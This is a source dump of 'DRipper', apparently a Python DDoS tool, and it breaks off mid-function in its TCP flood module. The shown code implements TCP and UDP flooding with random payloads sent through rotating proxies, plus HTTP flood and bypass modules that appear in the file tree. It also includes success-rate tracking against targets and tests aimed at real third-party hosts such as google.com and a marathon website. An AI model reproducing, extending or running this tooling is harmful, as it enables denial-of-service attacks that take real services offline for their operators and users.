├── ripper ├── __init__.py ├── actions │ ├── __init__.py │ ├── attack_method.py │ ├── tcp_flood.py │ ├── attack.py │ ├── udp_flood.py │ ├── http_bypass.py │ └── http_flood.py ├── context │ ├── __init__.py │ ├── events_journal.py │ ├── target.py │ └── context.py ├── stats │ ├── __init__.py │ ├── packets_stats.py │ ├── ip_info.py │ ├── connection_stats.py │ ├── utils.py │ ├── target_stats_manager.py │ └── context_stats_manager.py ├── assets │ └── headers.txt ├── headers_provider.py ├── duration_manager.py ├── socket_manager.py ├── time_interval_manager.py ├── github_updates_checker.py ├── proxy.py ├── proxy_manager.py ├── arg_parser.py ├── constants.py ├── common.py ├── targets_manager.py ├── health_check_manager.py └── services.py ├── tests ├── __init__.py ├── test_target.py ├── test_stats_ip_info.py ├── test_attack_tcp_flood.py ├── test_attack_udp_flood.py ├── test_github_updates_checker.py ├── test_stats_utils.py ├── test_context.py ├── test_common.py ├── test_targets_manager_packets_stats.py ├── test_attack_http_flood.py └── test_health_check_manager.py ├── _version.py ├── requirements.test.txt ├── requirements.txt ├── DRipper.py ├── docs ├── images │ └── dripper_interface.jpg ├── SetupGuide.md └── UserGuide.md ├── check_python_version.py ├── pytest.ini ├── .coveragerc ├── Dockerfile ├── .github ├── release-notes.sh └── workflows │ └── build.yml ├── setup.py ├── LICENSE ├── .gitignore ├── CHANGELOG.md └── README.md /ripper/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ripper/actions/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ripper/context/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ripper/stats/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /_version.py: -------------------------------------------------------------------------------- 1 | __version__ = "2.6.3" 2 | -------------------------------------------------------------------------------- /requirements.test.txt: -------------------------------------------------------------------------------- 1 | pytest>=7.1.0 2 | pytest-cov>=3.0.0 3 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | rich==12.0.0 2 | pysocks==1.7.1 3 | cloudscraper==1.2.60 4 | psutil==5.9.0 5 | requests>=2.27 6 | -------------------------------------------------------------------------------- /DRipper.py: -------------------------------------------------------------------------------- 1 | import check_python_version 2 | from ripper.services import cli 3 | 4 | if __name__ == '__main__': 5 | cli() 6 | -------------------------------------------------------------------------------- /docs/images/dripper_interface.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alexmon1989/russia_ddos/HEAD/docs/images/dripper_interface.jpg -------------------------------------------------------------------------------- /check_python_version.py: -------------------------------------------------------------------------------- 1 | from sys import version_info as vi, version 2 | 3 | if vi.major < 3 or (vi.major == 3 and vi.minor < 9): 4 | print('Minimum required Python version to run this script is 3.9!') 5 | print(f'Current version: {version}') 6 | exit(1) 7 | -------------------------------------------------------------------------------- /pytest.ini: -------------------------------------------------------------------------------- 1 | [pytest] 2 | python_files = test_*.py 3 | python_classes = Describe 4 | python_functions = it_* 5 | 6 | testpaths = tests 7 | addopts = 8 | --cov=ripper 9 | --cov-branch 10 | --cov-report=term 11 | ; --cov-report=html:./htmlcov 12 | -------------------------------------------------------------------------------- /ripper/assets/headers.txt: -------------------------------------------------------------------------------- 1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 2 | Accept-Language: en-us,en;q=0.5 3 | Accept-Encoding: gzip,deflate 4 | Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 5 | Keep-Alive: 115 6 | Connection: keep-alive 7 | Content-Type: text/html -------------------------------------------------------------------------------- /.coveragerc: -------------------------------------------------------------------------------- 1 | # .coveragerc to control coverage.py 2 | # https://coverage.readthedocs.io/en/latest/config.html 3 | 4 | [run] 5 | branch = true 6 | source = tests/* 7 | 8 | [paths] 9 | source = ripper 10 | 11 | [html] 12 | show_contexts = True 13 | directory = htmlcov 14 | 15 | [report] 16 | ignore_errors = True 17 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10-alpine 2 | ENV PYTHONUNBUFFERED=1 3 | 4 | COPY ./ /app 5 | WORKDIR /app 6 | 7 | RUN apk add --update \ 8 | curl git \ 9 | gcc libc-dev fortify-headers linux-headers && \ 10 | rm -rf /var/cache/apk/* 11 | RUN pip install --upgrade pip -e . 12 | 13 | ENTRYPOINT ["dripper"] 14 | -------------------------------------------------------------------------------- /tests/test_target.py: -------------------------------------------------------------------------------- 1 | import pytest as pytest 2 | 3 | from ripper.context.target import Target 4 | 5 | 6 | class DescribeTarget: 7 | def it_can_validate_connection_status(self): 8 | stat = Target(target_uri='http://google.com') 9 | 10 | assert stat.validate_connection(120) is True 11 | assert stat.validate_connection(-3600) is False 12 | -------------------------------------------------------------------------------- /tests/test_stats_ip_info.py: -------------------------------------------------------------------------------- 1 | import pytest as pytest 2 | 3 | from ripper.stats.ip_info import IpInfo 4 | 5 | 6 | class DescribeIpInfo: 7 | def it_has_my_ip_changed(self): 8 | start_ip = '192.168.0.1' 9 | ii = IpInfo(start_ip) 10 | 11 | assert not ii.is_ip_changed() 12 | ii.current_ip = '10.20.0.1' 13 | assert ii.is_ip_changed() 14 | -------------------------------------------------------------------------------- /ripper/actions/attack_method.py: -------------------------------------------------------------------------------- 1 | class AttackMethod: 2 | """Abstract attack method.""" 3 | 4 | @property 5 | def name(self): 6 | raise NotImplemented 7 | 8 | @property 9 | def label(self): 10 | raise NotImplemented 11 | 12 | def __call__(self, *args, **kwargs): 13 | raise NotImplementedError 14 | 15 | def validate(self): 16 | return True 17 | -------------------------------------------------------------------------------- /.github/release-notes.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | # -e Exit immediately if a command exits with a non-zero status. 4 | # -u Treat unset variables as an error when substituting. 5 | 6 | set -eu 7 | set -o pipefail 8 | 9 | # Get Release notes for the latest release from CHANGELOG.md 10 | # How to use: 11 | # release-notes.sh CHANGELOG.md > ReleaseNotes.md 12 | 13 | startline=$(($(cat "$1" | grep -nE '^## \[v[0-9]+' | head -n 1 | tail -n 1 | cut -d ":" -f 1) + 1)) 14 | finishline=$(($(cat "$1" | grep -nE '^## \[v[0-9]+' | head -n 2 | tail -n 1 | cut -d ":" -f 1) - 1)) 15 | changelog=$(sed -n "${startline},${finishline}p" "$1"); 16 | 17 | echo "${changelog}" 18 | -------------------------------------------------------------------------------- /tests/test_attack_tcp_flood.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | from collections import namedtuple 3 | 4 | from ripper.actions.tcp_flood import TcpFlood 5 | from ripper.context.context import Context 6 | 7 | Args = namedtuple('Args', 'targets threads_count') 8 | 9 | 10 | class DescribeTcpFloodAttackMethod: 11 | def it_has_correct_name(self): 12 | args = Args( 13 | targets=['tcp://localhost'], 14 | threads_count=100, 15 | ) 16 | ctx = Context(args) 17 | ctx.__init__(args) 18 | tcp_flood_am = TcpFlood(ctx.targets_manager.targets[0], ctx) 19 | assert tcp_flood_am.name == 'TCP Flood' 20 | assert tcp_flood_am.label == 'tcp-flood' 21 | 22 | # TODO Add more tests 23 | -------------------------------------------------------------------------------- /tests/test_attack_udp_flood.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | from collections import namedtuple 3 | 4 | from ripper.actions.udp_flood import UdpFlood 5 | from ripper.context.context import Context 6 | 7 | Args = namedtuple('Args', 'targets threads_count') 8 | 9 | 10 | class DescribeTcpFloodAttackMethod: 11 | def it_has_correct_name(self): 12 | args = Args( 13 | targets=['udp://localhost'], 14 | threads_count=100, 15 | ) 16 | ctx = Context(args) 17 | ctx.__init__(args) 18 | tcp_flood_am = UdpFlood(ctx.targets_manager.targets[0], ctx) 19 | assert tcp_flood_am.name == 'UDP Flood' 20 | assert tcp_flood_am.label == 'udp-flood' 21 | 22 | # TODO Add more tests 23 | -------------------------------------------------------------------------------- /ripper/headers_provider.py: -------------------------------------------------------------------------------- 1 | import os 2 | from ripper.common import Singleton, strip_lines, read_file_lines_fs 3 | 4 | 5 | def get_headers_dict(raw_headers: list[str]): 6 | """Set headers for the request.""" 7 | headers_dict = {} 8 | for line in raw_headers: 9 | parts = line.split(':') 10 | headers_dict[parts[0]] = parts[1].strip() 11 | 12 | return headers_dict 13 | 14 | 15 | class HeadersProvider(metaclass=Singleton): 16 | def __init__(self): 17 | self.refresh() 18 | 19 | def refresh(self): 20 | self.user_agents = strip_lines(read_file_lines_fs(os.path.dirname(__file__) + '/assets/user_agents.txt')) 21 | self.raw_headers = strip_lines(read_file_lines_fs(os.path.dirname(__file__) + '/assets/headers.txt')) 22 | self.headers = get_headers_dict(self.raw_headers) 23 | -------------------------------------------------------------------------------- /ripper/stats/packets_stats.py: -------------------------------------------------------------------------------- 1 | import time 2 | import threading 3 | 4 | 5 | class PacketsStats: 6 | """Class for TCP/UDP statistic collection.""" 7 | total_sent: int = 0 8 | """Total packets sent by TCP/UDP.""" 9 | 10 | total_sent_bytes: int = 0 11 | """Total sent bytes by TCP/UDP connect.""" 12 | connections_check_time: int = 0 13 | """Connection last check time.""" 14 | _lock: threading.Lock 15 | 16 | def __init__(self): 17 | self._lock = threading.Lock() 18 | self.connections_check_time = time.time_ns() 19 | 20 | def status_sent(self, sent_bytes: int = 0): 21 | """ 22 | Collect sent packets statistic. 23 | :param sent_bytes sent packet size in bytes. 24 | """ 25 | with self._lock: 26 | self.connections_check_time = time.time_ns() 27 | self.total_sent += 1 28 | self.total_sent_bytes += sent_bytes 29 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | import check_python_version 2 | from setuptools import setup, find_packages 3 | from ripper.constants import VERSION 4 | 5 | with open('requirements.txt', 'r', encoding='utf-8') as f: 6 | required = f.read().splitlines() 7 | 8 | with open('README.md', 'r', encoding='utf-8') as md: 9 | readme = md.read() 10 | 11 | setup( 12 | name='dripper', 13 | version=VERSION, 14 | long_description=readme, 15 | long_description_content_type='text/markdown', 16 | url='https://github.com/alexmon1989/russia_ddos', 17 | python_requires=">=3.9", 18 | packages=find_packages(exclude=['tests']), 19 | install_requires=required, 20 | package_data={ 21 | 'ripper': [ 22 | 'assets/headers.txt', 23 | 'assets/useragents.txt', 24 | ], 25 | }, 26 | entry_points={ 27 | 'console_scripts': [ 28 | 'dripper=ripper.services:cli', 29 | ], 30 | }, 31 | license='MIT' 32 | ) 33 | -------------------------------------------------------------------------------- /tests/test_github_updates_checker.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | import time 3 | 4 | from ripper.github_updates_checker import GithubUpdatesChecker, Version 5 | 6 | 7 | class DescribeGithubUpdatesChecker: 8 | def it_can_read_latest_version(self): 9 | guc = GithubUpdatesChecker() 10 | latest_version = guc.fetch_latest_version() 11 | assert Version('1.0.0') <= latest_version 12 | 13 | def it_can_get_str_version(self): 14 | assert Version('2.3.1').version == '2.3.1' 15 | 16 | def it_can_read_latest_version_on_background(self): 17 | guc = GithubUpdatesChecker() 18 | guc.demon_update_latest_version() 19 | 20 | for _ in range(5): 21 | if guc.latest_version is None: 22 | time.sleep(1) 23 | else: 24 | break 25 | if guc.latest_version is None: 26 | # rate limiter 27 | assert False 28 | assert Version('1.0.0') <= guc.latest_version 29 | -------------------------------------------------------------------------------- /tests/test_stats_utils.py: -------------------------------------------------------------------------------- 1 | import pytest as pytest 2 | 3 | from ripper.stats.utils import build_http_codes_distribution, rate_color 4 | 5 | 6 | class DescribeStatsUtils: 7 | @pytest.mark.parametrize('actual, expected', [ 8 | (0, '[red]0[/]'), 9 | (15, '[red]15[/]'), 10 | (35, '[dark_orange]35[/]'), 11 | (55, '[orange1]55[/]'), 12 | (65, '[orange1]65[/]'), 13 | (75, '[yellow4]75[/]'), 14 | (85, '[yellow4]85[/]'), 15 | (95, '[green1]95[/]'), 16 | ]) 17 | def it_applies_different_colors_depending_on_rate(self, actual, expected): 18 | assert rate_color(actual) == expected 19 | 20 | def it_builds_http_codes_distribution(self): 21 | http_status_codes = { 22 | 200: 1, 23 | 300: 2, 24 | 400: 10, 25 | 429: 3, 26 | 500: 2, 27 | } 28 | actual = build_http_codes_distribution(http_status_codes) 29 | assert actual == '200: 6%, 300: 11%, 400: 56%, 429: 17%, 500: 11%' 30 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 alexmon1989 and contributors. 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /ripper/duration_manager.py: -------------------------------------------------------------------------------- 1 | from datetime import datetime, timedelta 2 | import os 3 | import time 4 | from threading import Thread 5 | 6 | 7 | def delayed_os_exit(delay: int): 8 | time.sleep(delay) 9 | os._exit(0) 10 | 11 | 12 | class DurationManager: 13 | _start_time: datetime = None 14 | """Script start time.""" 15 | _duration: timedelta = None 16 | """Attack duration. After this duration script will stop it\'s execution.""" 17 | 18 | def __init__(self, duration_seconds: int = None): 19 | if duration_seconds is not None: 20 | self._duration = timedelta(0, duration_seconds) 21 | 22 | def start_countdown(self): 23 | if self._duration is not None: 24 | self._start_time = datetime.now() 25 | Thread(target=delayed_os_exit, args=[self._duration.total_seconds()]).start() 26 | 27 | @property 28 | def finish_time(self) -> datetime: 29 | if self._duration is None: 30 | return None 31 | return self._start_time + self._duration 32 | 33 | @property 34 | def duration(self) -> timedelta: 35 | return self._duration 36 | 37 | @property 38 | def remaining_duration(self) -> timedelta: 39 | if self._duration is None: 40 | return None 41 | return self.finish_time - datetime.now() 42 | -------------------------------------------------------------------------------- /ripper/stats/ip_info.py: -------------------------------------------------------------------------------- 1 | from ripper.constants import DEFAULT_CURRENT_IP_VALUE 2 | from ripper.common import get_country_by_ipv4 3 | 4 | 5 | class IpInfo: 6 | """All the info about IP addresses and Geo info.""" 7 | country: str = None 8 | """Country code based on your public IPv4 address.""" 9 | start_ip: str = None 10 | """My IPv4 address within script starting.""" 11 | current_ip: str = None 12 | """My current IPv4 address. It can be changed during script run.""" 13 | 14 | def __init__(self, ip: str): 15 | self.start_ip = ip 16 | self.current_ip = self.start_ip 17 | self.country = get_country_by_ipv4(self.start_ip) 18 | 19 | @property 20 | def ip_masked(self) -> str: 21 | """ 22 | Get my initial IPv4 address with masked octets. 23 | 24 | 127.0.0.1 -> 127.***.***.*** 25 | """ 26 | parts = self.start_ip.split('.') 27 | if not parts[0].isdigit(): 28 | return DEFAULT_CURRENT_IP_VALUE 29 | 30 | if len(parts) > 1 and parts[0].isdigit(): 31 | return f'{parts[0]}.***.***.***' 32 | else: 33 | return parts[0] 34 | 35 | # TODO make property 36 | def is_ip_changed(self) -> bool: 37 | """:return: True is start ip doesn't equal to current ip""" 38 | return self.start_ip != self.current_ip 39 | -------------------------------------------------------------------------------- /ripper/stats/connection_stats.py: -------------------------------------------------------------------------------- 1 | from threading import Lock 2 | 3 | 4 | class ConnectionStats: 5 | """Class for Connection statistic""" 6 | success_prev: int = 0 7 | """Total connections to HOST with Success status (previous state)""" 8 | success: int = 0 9 | """Total connections to HOST with Success status""" 10 | failed: int = 0 11 | """Total connections to HOST with Failed status.""" 12 | last_check_time: int = 0 13 | """Last check connection time.""" 14 | in_progress: bool = False 15 | """Connection state used for checking liveness of Socket.""" 16 | is_connected: bool = False 17 | _lock: Lock = None 18 | 19 | def __init__(self): 20 | self._lock = Lock() 21 | 22 | def get_success_rate(self) -> int: 23 | """Calculate Success Rate for connection.""" 24 | if self.success == 0: 25 | return 0 26 | 27 | return int(self.success / (self.success + self.failed) * 100) 28 | 29 | def sync_success(self): 30 | """Sync previous success state with current success state.""" 31 | self.success_prev = self.success 32 | 33 | def set_state_in_progress(self): 34 | """Set connection State - in progress.""" 35 | self.in_progress = True 36 | 37 | def set_state_is_connected(self): 38 | """Set connection State - is connected.""" 39 | self.in_progress = False 40 | self.is_connected = True 41 | 42 | def status_success(self): 43 | """Collect successful connections.""" 44 | self.success += 1 45 | 46 | def status_failed(self): 47 | """Collect failed connections.""" 48 | self.failed += 1 49 | -------------------------------------------------------------------------------- /ripper/stats/utils.py: -------------------------------------------------------------------------------- 1 | from ripper.constants import BADGE_WARN, BADGE_INFO, BADGE_ERROR 2 | 3 | 4 | def badge(message: str, badge_template: str) -> str: 5 | """Create color badge with message using template.""" 6 | return badge_template.format(message=message) 7 | 8 | 9 | def badge_info(message: str) -> str: 10 | return badge(message, BADGE_INFO) 11 | 12 | 13 | def badge_warn(message: str) -> str: 14 | return badge(message, BADGE_WARN) 15 | 16 | 17 | def badge_error(message: str) -> str: 18 | return badge(message, BADGE_ERROR) 19 | 20 | 21 | def rate_color(rate: int, units: str = '') -> str: 22 | """ 23 | Get color schema for percentage value. 24 | Color schema looks like red-yellow-green scale for values 0-50-100. 25 | """ 26 | color = '[red]' 27 | if 30 > rate > 20: 28 | color = '[orange_red1]' 29 | if 50 > rate > 30: 30 | color = '[dark_orange]' 31 | if 70 > rate > 50: 32 | color = '[orange1]' 33 | if 90 > rate > 70: 34 | color = '[yellow4]' 35 | if rate >= 90: 36 | color = '[green1]' 37 | 38 | return f'{color}{rate}{units}[/]' 39 | 40 | 41 | def build_http_codes_distribution(http_codes_counter) -> str: 42 | codes_distribution = [] 43 | total = sum(http_codes_counter.values()) 44 | if not total: 45 | return '...detecting' 46 | for code in http_codes_counter.keys(): 47 | count = http_codes_counter[code] 48 | percent = round(count * 100 / total) 49 | codes_distribution.append(f'{code}: {percent}%') 50 | return ', '.join(codes_distribution) 51 | 52 | 53 | class Row: 54 | def __init__(self, label: str, value: str = '', visible: bool = True, end_section: bool = False): 55 | self.label = str(label) 56 | self.value = str(value) 57 | self.visible = visible 58 | self.end_section = end_section 59 | -------------------------------------------------------------------------------- /ripper/socket_manager.py: -------------------------------------------------------------------------------- 1 | import socks 2 | from socket import socket, AF_INET, SOCK_DGRAM, SOCK_STREAM, SOL_TCP, IPPROTO_TCP, TCP_NODELAY 3 | 4 | from ripper.proxy import Proxy 5 | 6 | 7 | class SocketManager: 8 | """Manager for creating and closing sockets.""" 9 | 10 | _socket: socket = None 11 | """Shared socket.""" 12 | socket_timeout: int = None 13 | """Timeout for socket connection is seconds.""" 14 | 15 | def __init__(self, socket_timeout: int = None): 16 | self.socket_timeout = socket_timeout 17 | 18 | def create_udp_socket(self) -> socket: 19 | """Creates udp socket.""" 20 | # There is issues with UDP protocol via PySock library 21 | udp_socket = socket(AF_INET, SOCK_DGRAM) 22 | udp_socket.settimeout(self.socket_timeout) if self.socket_timeout is not None else 0 23 | 24 | return udp_socket 25 | 26 | def create_tcp_socket(self, proxy: Proxy = None) -> socket: 27 | """Returns tcp socket.""" 28 | tcp_socket = socks.socksocket(AF_INET, SOCK_STREAM, SOL_TCP) 29 | 30 | proxy.decorate_socket(tcp_socket) if proxy is not None else 0 31 | 32 | tcp_socket.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1) 33 | tcp_socket.settimeout(self.socket_timeout) if self.socket_timeout is not None else 0 34 | 35 | return tcp_socket 36 | 37 | def get_udp_socket(self) -> socket: 38 | """Returns shared UDP socket.""" 39 | if self._socket is None: 40 | self._socket = self.create_udp_socket() 41 | 42 | return self._socket 43 | 44 | def get_tcp_socket(self, proxy: Proxy = None) -> socket: 45 | """Returns shared TCP socket.""" 46 | if self._socket is None: 47 | self._socket = self.create_tcp_socket(proxy) 48 | 49 | return self._socket 50 | 51 | def close_socket(self) -> bool: 52 | """Closes udp socket if it exists.""" 53 | if self._socket is not None: 54 | self._socket.close() 55 | self._socket = None 56 | return True 57 | return False 58 | -------------------------------------------------------------------------------- /ripper/time_interval_manager.py: -------------------------------------------------------------------------------- 1 | from datetime import datetime, timedelta 2 | from collections import defaultdict 3 | 4 | from ripper.common import Singleton, s2ns 5 | 6 | 7 | class TimeIntervalManager(metaclass=Singleton): 8 | _timer_bucket: dict[str, datetime] = None 9 | """Internal stopwatch.""" 10 | _start_time: datetime = None 11 | """Script start time.""" 12 | 13 | def __init__(self): 14 | self._start_time = datetime.now() 15 | self._timer_bucket = defaultdict(dict[str, datetime]) 16 | 17 | @property 18 | def start_time(self) -> datetime: 19 | return self._start_time 20 | 21 | @property 22 | def execution_duration(self) -> timedelta: 23 | return datetime.now() - self._start_time 24 | 25 | @property 26 | def start_time_ns(self) -> int: 27 | """Get start time in nanoseconds.""" 28 | if not self._start_time: 29 | return 0 30 | return s2ns(self._start_time.timestamp()) 31 | 32 | def _get_key_name(self, bucket: str = None) -> str: 33 | if bucket: 34 | return bucket 35 | return '__stopwatch__' 36 | 37 | def check_timer_elapsed(self, sec: int, bucket: str = None) -> bool: 38 | """ 39 | Check if time in seconds elapsed from last check. 40 | :param sec: Amount of seconds which needs to check. 41 | :param bucket: Bucket name to track specific timer. 42 | :return: True if specified seconds elapsed, False - if not elapsed. 43 | """ 44 | key = self._get_key_name(bucket) 45 | delta = self.get_timer_seconds(bucket=key) 46 | if int(delta) < sec: 47 | return False 48 | else: 49 | self._timer_bucket[key] = datetime.now() 50 | return True 51 | 52 | def get_timer_seconds(self, bucket: str = None) -> int: 53 | key = self._get_key_name(bucket) 54 | if key not in self._timer_bucket: 55 | return int(datetime.now().timestamp()) 56 | 57 | return int((datetime.now() - self._timer_bucket[bucket]).total_seconds()) 58 | -------------------------------------------------------------------------------- /tests/test_context.py: -------------------------------------------------------------------------------- 1 | from datetime import datetime, timedelta 2 | from collections import namedtuple 3 | import time 4 | import pytest as pytest 5 | 6 | from ripper.context.context import Context 7 | 8 | Args = namedtuple('Args', 'targets threads_count') 9 | 10 | 11 | class DescribeContext: 12 | args: Args = Args( 13 | targets=['https://httpbin.org'], 14 | threads_count=100, 15 | ) 16 | 17 | @pytest.mark.parametrize('actual_ip, expected_result', [ 18 | ('127.0.0.1', '127.***.***.***'), 19 | ('42.199.100.200', '42.***.***.***'), 20 | ('42', '42'), 21 | # ('...detecting', '...detecting') 22 | ]) 23 | def it_can_get_ip_masked(self, actual_ip, expected_result): 24 | context = Context(self.args) 25 | context.__init__(self.args) 26 | context.myIpInfo.start_ip = actual_ip 27 | assert context.myIpInfo.ip_masked == expected_result 28 | 29 | def it_checks_time_interval(self): 30 | context = Context(self.args) 31 | context.__init__(self.args) 32 | last_2mins = datetime.now() - timedelta(minutes=2) 33 | context.time_interval_manager._start_time = last_2mins 34 | 35 | assert datetime.now() > context.time_interval_manager.start_time 36 | assert context.time_interval_manager.check_timer_elapsed(5) is True 37 | assert context.time_interval_manager.check_timer_elapsed(5) is False 38 | time.sleep(2) 39 | assert context.time_interval_manager.check_timer_elapsed(5) is False 40 | assert context.time_interval_manager.check_timer_elapsed(1) is True 41 | 42 | @pytest.mark.parametrize('target_uri, attack_method', [ 43 | ('http://google.com', 'http-flood'), 44 | ('tcp://google.com', 'tcp-flood'), 45 | ('udp://google.com', 'udp-flood'), 46 | ]) 47 | def it_detects_attack_by_target_in_context(self, target_uri, attack_method): 48 | args = Args( 49 | targets=[target_uri], 50 | threads_count=100, 51 | ) 52 | context = Context(args) 53 | # context is singleton now, so it should be reinitialized manually 54 | context.__init__(args) 55 | assert context.targets_manager.targets[0].attack_method == attack_method 56 | -------------------------------------------------------------------------------- /tests/test_common.py: -------------------------------------------------------------------------------- 1 | import pytest as pytest 2 | import time 3 | import random 4 | 5 | from ripper.common import convert_size, detect_cloudflare, generate_fixed_size_random_bytes, generate_random_bytes 6 | 7 | 8 | class DescribeCommonMethods: 9 | @pytest.mark.parametrize('actual, expected', [ 10 | (0, '0.00 B'), 11 | (100, '100.00 B'), 12 | (1024, '1.00 kB'), 13 | (16384096, '15.63 MB'), 14 | (32256798429, '30.04 GB'), 15 | (620832256798429, '564.64 TB'), 16 | (620832256798429256, '551.41 PB'), 17 | ]) 18 | def it_has_convert_size(self, actual, expected): 19 | assert convert_size(actual) == expected 20 | 21 | @pytest.mark.parametrize('actual, units, expected', [ 22 | (1024, 'B/s', '1.00 kB/s'), 23 | (1024, 'Bps', '1.00 kBps'), 24 | (16384096, 'B/s', '15.63 MB/s') 25 | ]) 26 | def it_has_convert_size_with_units(self, actual, units, expected): 27 | assert convert_size(actual, units) == expected 28 | 29 | def it_can_check_cloudflare_protection(self): 30 | assert detect_cloudflare('https://www.thesfmarathon.com') is True 31 | 32 | def it_can_generate_fixed_size_random_sequence(self): 33 | b1 = generate_fixed_size_random_bytes(10) 34 | assert len(b1) == 10 35 | b2 = generate_fixed_size_random_bytes(10) 36 | assert len(b2) == 10 37 | assert b1 == b1 38 | assert b1 != b2 39 | start = time.time() 40 | for _ in range(1000): 41 | generate_fixed_size_random_bytes(65536) 42 | duration = time.time() - start 43 | # 1K packets per second 44 | assert duration < 1 45 | 46 | def it_can_generate_random_bytes(self): 47 | for _ in range(10): 48 | min_len = random.randint(1, 1000) 49 | max_len = min_len + random.randint(1, 1000) 50 | bt = generate_random_bytes(min_len, max_len) 51 | assert max_len >= len(bt) >= min_len 52 | 53 | def it_can_generate_random_bytes_with_empty_length(self): 54 | bt = generate_random_bytes(0, 0) 55 | assert not bt 56 | 57 | def it_can_generate_long_fixed_random_bytes(self): 58 | bt = generate_random_bytes(10000, 10000) 59 | assert len(bt) == 10000 60 | -------------------------------------------------------------------------------- /ripper/github_updates_checker.py: -------------------------------------------------------------------------------- 1 | import re 2 | import urllib.request 3 | import threading 4 | 5 | from ripper.constants import * 6 | 7 | 8 | class Version: 9 | @staticmethod 10 | def validate(version: str): 11 | parts = version.split('.') 12 | if len(parts) != 3: 13 | return False 14 | for ps in parts: 15 | if not ps.isdigit(): 16 | return False 17 | return True 18 | 19 | _parts: list[int] = None 20 | 21 | def __init__(self, version: str): 22 | if not Version.validate(version): 23 | raise ValueError() 24 | self._parts = [int(ps) for ps in version.split('.')] 25 | 26 | @property 27 | def version(self): 28 | return '.'.join([str(ps) for ps in self._parts]) 29 | 30 | def calc_positional_value(self): 31 | if not self._parts: 32 | return 0 33 | return self._parts[2] + self._parts[1] * 1000 + self._parts[0] * 1000_000 34 | 35 | def __ge__(self, other): 36 | return self.calc_positional_value() >= other.calc_positional_value() 37 | 38 | def __lt__(self, other): 39 | return self.calc_positional_value() < other.calc_positional_value() 40 | 41 | def __eq__(self, other): 42 | return self.calc_positional_value() == other.calc_positional_value() 43 | 44 | 45 | class GithubUpdatesChecker: 46 | _owner: str = '' 47 | _repo: str = '' 48 | latest_version: Version = None 49 | 50 | def __init__(self, owner: str = GITHUB_OWNER, repo: str = GITHUB_REPO): 51 | self._owner = owner 52 | self._repo = repo 53 | 54 | def get_request_url(self): 55 | return f'https://raw.githubusercontent.com/{self._owner}/{self._repo}/main/_version.py' 56 | 57 | def fetch_latest_version(self) -> Version: 58 | try: 59 | request = urllib.request.Request(url=self.get_request_url()) 60 | raw: str = urllib.request.urlopen(request).read().decode('utf8') 61 | ver = re.search(r"(\d+\.\d+\.\d+)", raw).group(0) 62 | self.latest_version = Version(ver) 63 | except: 64 | return None 65 | 66 | return self.latest_version 67 | 68 | def demon_update_latest_version(self): 69 | threading.Thread(target=self.fetch_latest_version).start() 70 | -------------------------------------------------------------------------------- /ripper/actions/tcp_flood.py: -------------------------------------------------------------------------------- 1 | from socket import socket 2 | from contextlib import suppress 3 | from typing import Any 4 | from socks import ProxyError 5 | 6 | from ripper.context.events_journal import EventsJournal 7 | from ripper.context.target import Target 8 | from ripper.common import generate_random_bytes 9 | from ripper.actions.attack_method import AttackMethod 10 | from ripper.proxy import Proxy 11 | 12 | # Forward Reference 13 | Context = 'Context' 14 | 15 | events_journal = EventsJournal() 16 | 17 | 18 | class TcpFlood(AttackMethod): 19 | """TCP Flood method.""" 20 | 21 | name: str = 'TCP Flood' 22 | label: str = 'tcp-flood' 23 | 24 | _sock: socket 25 | _target: Target 26 | _ctx: Context 27 | _proxy: Proxy = None 28 | 29 | def __init__(self, target: Target, context: Context): 30 | self._target = target 31 | self._ctx = context 32 | 33 | def create_connection(self) -> socket: 34 | self._proxy = self._ctx.proxy_manager.get_random_proxy() 35 | conn = self._ctx.sock_manager.create_tcp_socket(self._proxy) 36 | conn.connect(self._target.hostip_port_tuple()) 37 | 38 | return conn 39 | 40 | def __call__(self, *args, **kwargs): 41 | with suppress(Exception), self.create_connection() as tcp_conn: 42 | self._target.stats.connect.status_success() 43 | events_journal.info('Creating new TCP connection...', target=self._target) 44 | while self.send(tcp_conn): 45 | if self._ctx.dry_run: 46 | break 47 | continue 48 | 49 | self._target.stats.connect.status_failed() 50 | # self._ctx.sock_manager.close_socket() 51 | 52 | def send(self, sock: socket) -> bool: 53 | send_bytes = generate_random_bytes(self._target.min_random_packet_len, self._target.max_random_packet_len) 54 | try: 55 | sent = sock.send(send_bytes) 56 | except ProxyError as ep: 57 | 